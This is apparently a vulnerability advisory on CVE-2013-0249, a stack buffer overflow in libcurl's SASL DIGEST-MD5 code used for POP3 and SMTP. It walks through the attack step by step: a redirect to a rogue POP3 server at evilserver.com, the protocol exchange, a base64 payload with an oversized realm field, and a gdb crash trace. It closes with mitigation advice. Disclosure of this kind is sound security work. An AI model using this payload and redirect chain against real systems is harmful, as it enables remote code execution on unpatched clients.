Volema found remotely exploitable buffer overflow vulnerability in libcurl POP3, SMTP protocol handlers which lead to code execution (RCE). When negotiating SASL DIGEST-MD5 authentication, the function Curl_sasl_create_digest_md5_message() uses the data provided from the server without doing the proper length checks and that data is then appended to a local fixed-size buffer on the stack.

Vendor notified, CVE-2013-0249 released.

Attack Concept Outline

We have the permissions to send custom HTTP requests with curl. We send request to our http://evilserver.com/

GET / HTTP / 1 . 0 Host : evilserver . com

server answers with

HTTP / 1 . 0 302 Found Location : pop3 : // x : x @ evilserver . com / .

"smart" curl interpretes redirect and connects to evilserver.com port 110/TCP using POP3 proto. Server answers

+ OK POP3 server ready

curl sends

CAPA

servers answers with DIGEST-MD5 only

+ OK List of capabilities follows SASL DIGEST - MD5 IMPLEMENTATION dumbydumb POP3 server

so, libcurl has to send

AUTH DIGEST - MD5

then server sends the payload

+ cmVhbG09IkFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBIixub25jZT0iT0E2TUc5dEVRR20yaGgiLHFvcD0iYXV0aCIsYWxnb3JpdGhtPW1kNS1zZXNzLGNoYXJzZXQ9dXRmLTg =

and overflow happens because of fixed "uri" buffer size (128) and "realm" which is also 128 bytes

realm = " AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA " , nonce = " OA6MG9tEQGm2hh " , qop = " auth " , algorithm = md5 - sess , charset = utf - 8

how it looks in gdb

Program received signal SIGSEGV , Segmentation fault . 0 x00007fd2b238298d in ?? () from / lib / x86_64 - linux - gnu / libc . so . 6 ( gdb ) bt #0 0 x00007fd2b238298d in ?? () from / lib / x86_64 - linux - gnu / libc . so . 6 #1 0 x00007fd2b2a5cc07 in Curl_sasl_create_digest_md5_message () from / home / kyprizel / test / curl - 7 . 28 . 1 / lib / . libs / libcurl . so . 4 #2 0 x4141414141414141 in ?? () ... #1469 0 x4141414141414141 in ?? () #1470 0 x656d616e72657375 in ?? () Cannot access memory at address 0 x7fff63b8b000

Original exploit: pop3d.py.

Mitigation

We recommend to disable protocols other than HTTP(S) in your application using options CURLOPT_PROTOCOLS and CURLOPT_REDIR_PROTOCOLS. libcurl version should be updated.